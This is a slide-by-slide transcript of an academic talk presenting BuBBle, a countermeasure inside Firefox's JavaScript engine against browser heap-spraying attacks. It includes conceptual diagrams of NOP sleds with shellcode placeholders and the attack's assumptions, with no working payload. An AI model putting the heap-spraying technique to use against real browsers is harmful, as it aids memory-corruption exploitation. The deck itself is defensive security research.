BuBBle: a Javascript engine level countermeasure against heap-spraying attacks
-
Upload
francesco-gadaleta -
Category
Education
-
view
902 -
download
2
description
Transcript of BuBBle: a Javascript engine level countermeasure against heap-spraying attacks
![Page 1: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/1.jpg)
: a Javascript countermeasure against heap-‐spraying attacks
Francesco Gadaleta -‐ Yves Younan -‐ Wouter Joosen
Katholieke Universiteit Leuven
ESSoS 2010
Pisa 3-‐4 Feb.
![Page 2: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/2.jpg)
Overview
‣ Heap-‐spraying attacks
‣ BuBBle approach
‣ Experiments and Results
‣ Conclusion
![Page 3: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/3.jpg)
A new target: web browsers
![Page 4: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/4.jpg)
A new target: web browsers
![Page 5: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/5.jpg)
A new target: web browsers
![Page 6: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/6.jpg)
Firefox vulnerabilitieshttp://www.mozilla.org/security/known-‐vulnerabilities/firefox35.html
Integer overflow
Memory corruption
Heap buffer overflow in string to number conversion
Crash and remote code execution Flash player unloading
![Page 7: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/7.jpg)
Problem description: the art of spraying the heap
![Page 8: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/8.jpg)
Problem description: the art of spraying the heap
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
![Page 9: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/9.jpg)
Problem description: the art of spraying the heap
sprayed heap
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
![Page 10: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/10.jpg)
Heap-‐spraying attacks
Assumptions
A buffer overflow/memory corruption vulnerability
Users allowed to allocate memory
Homogeneity of memory
![Page 11: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/11.jpg)
Heap-‐spraying attacks
Assumptions
A buffer overflow/memory corruption vulnerability
Users allowed to allocate memory
Homogeneity of memory
![Page 12: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/12.jpg)
Heap-‐spraying attacks
Assumptions
A buffer overflow/memory corruption vulnerability
Users allowed to allocate memory
Homogeneity of memory
![Page 13: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/13.jpg)
Heap-‐spraying attacks
Assumptions
A buffer overflow/memory corruption vulnerability
Users allowed to allocate memory
Homogeneity of memory
![Page 14: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/14.jpg)
BuBBle approach: Tracemonkey internals
Homogeneity of memory -‐> monolithical data structure
• Javascript Strings
![Page 15: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/15.jpg)
BuBBle approach:the JSString type (Tracemonkey -‐ Mozilla Firefox 3.7)
JSString
mLength
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
mChars
Tracemonkey internals
![Page 16: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/16.jpg)
BuBBle approach:the JSString type (Tracemonkey -‐ Mozilla Firefox 3.7)
JSString
mLength
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
mChars
SHELLCODE
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90
Tracemonkey internals
![Page 17: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/17.jpg)
BuBBle approach
• Introduce diversity in contiguous blocks of memory
• transform Javascript strings (internal structure)
![Page 18: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/18.jpg)
approachHi. I am a dangerous string to jump into a shellcode
Transform
Hi. I am a dangerous string to jump into a shellcode
![Page 19: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/19.jpg)
approachHi. I am a dangerous string to jump into a shellcode
Transform
Hi. I am a dangerous string to jump into a shellcode
Restore
Hi. I am a dangerous string to jump into a shellcode
![Page 20: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/20.jpg)
approachHi. I am a dangerous string to jump into a shellcode
Transform
Hi. I am a dangerous string to jump into a shellcode
Restore
Hi. I am a dangerous string to jump into a shellcode
<Define string>
![Page 21: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/21.jpg)
approachHi. I am a dangerous string to jump into a shellcode
Transform
Hi. I am a dangerous string to jump into a shellcode
Restore
Hi. I am a dangerous string to jump into a shellcode
<Define string>
![Page 22: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/22.jpg)
approachHi. I am a dangerous string to jump into a shellcode
Transform
Hi. I am a dangerous string to jump into a shellcode
Restore
Hi. I am a dangerous string to jump into a shellcode
<Define string>
<Use string>
![Page 23: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/23.jpg)
approachHi. I am a dangerous string to jump into a shellcode
Transform
Hi. I am a dangerous string to jump into a shellcode
Restore
Hi. I am a dangerous string to jump into a shellcode
<Define string>
<Use string>
<support data structure>
![Page 24: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/24.jpg)
BuBBle approach: support data
• Interrupt array of characters
• Change characters at random positions: how many?
• Save support data
![Page 25: BuBBle: a Javascript engine level countermeasure against heap-spraying attacks](https://reader034.fdocuments.in/reader034/viewer/2022051314/5575c36fd8b42a312a8b4b9c/html5/thumbnails/25.jpg)
BuBBle approach: support data
Num. intervals
Pos. 1st char
Value 1st char
Pos. 2nd char
Value 2nd char
...
• Interrupt array of characters
• Change characters at random positions: how many?
• Save support data
